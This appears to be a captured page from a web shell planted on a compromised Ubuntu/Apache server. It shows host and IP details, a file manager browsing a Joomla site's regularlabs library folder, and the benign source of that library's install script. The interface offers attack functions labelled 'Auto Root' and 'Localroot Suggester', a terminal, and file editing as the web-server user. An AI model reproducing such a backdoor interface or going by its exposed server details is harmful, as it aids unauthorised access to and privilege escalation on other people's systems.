Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
paroquia-rm.bak /
libraries /
regularlabs /
Delete
Unzip
Name
Size
Permission
Date
Action
fields
[ DIR ]
drwxr-xr-x
2017-10-08 19:49
helpers
[ DIR ]
drwxr-xr-x
2017-10-08 19:49
src
[ DIR ]
drwxr-xr-x
2017-10-08 19:49
vendor
[ DIR ]
drwxr-xr-x
2017-10-08 19:49
autoload.php
53
B
-rw-r--r--
2017-10-08 19:49
regularlabs.xml
1.02
KB
-rw-r--r--
2017-10-08 19:49
script.install.helper.php
21.09
KB
-rw-r--r--
2017-10-08 19:49
script.install.php
840
B
-rw-r--r--
2017-10-08 19:49
Save
Rename
<?php /** * @package Regular Labs Library * @version 17.9.4890 * * @author Peter van Westen <info@regularlabs.com> * @link http://www.regularlabs.com * @copyright Copyright © 2017 Regular Labs All Rights Reserved * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL */ defined('_JEXEC') or die; if ( ! class_exists('RegularLabsInstallerScript')) { require_once __DIR__ . '/script.install.helper.php'; class RegularLabsInstallerScript extends RegularLabsInstallerScriptHelper { public $name = 'Regular Labs Library'; public $alias = 'regularlabs'; public $extension_type = 'library'; public function onBeforeInstall($route) { if ( ! $this->isNewer()) { $this->softbreak = true; return false; } return true; } } }